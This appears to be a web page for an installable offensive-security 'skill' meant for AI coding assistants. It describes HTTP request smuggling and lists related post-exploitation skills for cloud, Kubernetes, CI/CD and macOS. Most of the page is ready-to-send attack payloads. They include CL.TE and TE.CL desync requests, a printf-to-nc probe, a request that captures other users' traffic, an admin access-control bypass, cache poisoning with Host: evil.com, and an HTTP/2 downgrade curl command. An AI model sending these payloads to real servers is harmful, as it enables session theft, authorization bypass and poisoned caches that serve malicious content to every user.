القائمة
HTTP request smuggling — CL.TE, TE.CL, TE.TE desync attacks for cache poisoning and auth bypass
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-request-smuggling |
| description | HTTP request smuggling — CL.TE, TE.CL, TE.TE desync attacks for cache poisoning and auth bypass |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["request-smuggling","http-desync","web","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444"] |
| chains_with | ["attack-cache-poison","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-cache-poison":"Smuggling + cache = stored XSS/redirect for all users"} |
Exploit disagreements between front-end and back-end servers on request boundary parsing (Content-Length vs Transfer-Encoding) to smuggle a second request.
CL.TE (front uses Content-Length, back uses Transfer-Encoding):
POST / HTTP/1.1
Host: TARGET
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
TE.CL (front uses Transfer-Encoding, back uses Content-Length):
POST / HTTP/1.1
Host: TARGET
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
Send ambiguous request, measure response time:
# CL.TE detection (timeout = vulnerable)
printf 'POST / HTTP/1.1\r\nHost: TARGET\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\nX' | timeout 10 nc TARGET 80
CL.TE confirmed:
POST / HTTP/1.1
Host: TARGET
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404-proof HTTP/1.1
X: x
If next request to / returns 404 or different page, smuggling is confirmed.
Capture other user's request:
POST / HTTP/1.1
Host: TARGET
Content-Length: 100
Transfer-Encoding: chunked
0
POST /log HTTP/1.1
Content-Length: 10000
Content-Type: application/x-www-form-urlencoded
data=
Next user's request is appended to data= parameter.
Bypass front-end access controls:
POST / HTTP/1.1
Host: TARGET
Content-Length: 50
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: TARGET
X: x
Cache poisoning via smuggling:
POST / HTTP/1.1
Host: TARGET
Content-Length: 100
Transfer-Encoding: chunked
0
GET /static/main.js HTTP/1.1
Host: evil.com
X: x
# HTTP/2 downgrade smuggling
curl --http2 https://TARGET/ \
-H "Content-Length: 0" \
-H "Transfer-Encoding: chunked" \
-d "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: TARGET\r\n\r\n"
| Finding | Severity |
|---|---|
| Request smuggling → capture user requests | Critical (P1) |
| Smuggling → admin access bypass | Critical (P1) |
| Smuggling → cache poisoning | Critical (P1) |
| CL.TE or TE.CL desync confirmed | High (P2) |